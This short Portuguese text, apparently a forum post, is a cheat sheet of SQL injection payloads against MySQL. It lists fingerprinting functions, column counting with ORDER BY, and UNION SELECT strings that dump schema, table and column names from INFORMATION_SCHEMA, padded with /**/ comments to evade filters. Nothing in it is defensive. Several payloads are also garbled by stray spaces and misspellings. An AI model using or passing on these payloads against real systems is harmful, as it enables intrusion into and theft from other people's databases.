user(): Para conhecer o banco de dados do usuário ajuda a descobrir o PhpMyAdmin
version():Versão do Banco de Dados
database():Nome do Banco de Dados
@@datadir:Localização do Banco de Dados
+order+by+escobrir a Quantidade de Colunas
+union+select: Uniao das Colunas



Exemplos:

concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema)
concat_ws(0x3a3a3a,table_name,column_name)
concat(column_name,0x3a,table_schema,0x2e,table_na me)

group_concat(column_nome,0x3a,table_schema,0x2e,ta ble_nome)+from+information_schema.columns+where+co lumn_nome+like+char


hex(unhex()

AES_ENCRYPT()

AES_ENCRYPT().

Exemplos:

/**/UNION/**/SELECT(/**/1,2,3,(concat_ws(0x3a,table_schema,table_name,colu mn_name) ,5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS)/**/LIMIT/**/180,1

/ ** / UNION / ** / select / ** / 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 / ** / from / ** / INFORMATION_SCHEMA.COLUMNS / ** / LIMIT / ** / 180,1 / *

/*--*/ UNION/*--*/ select /*--*/ 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/ from /*--*/ INFORMATION_SCHEMA.COLUMNS/*--*/LIMIT /*--*/ 180,1 / *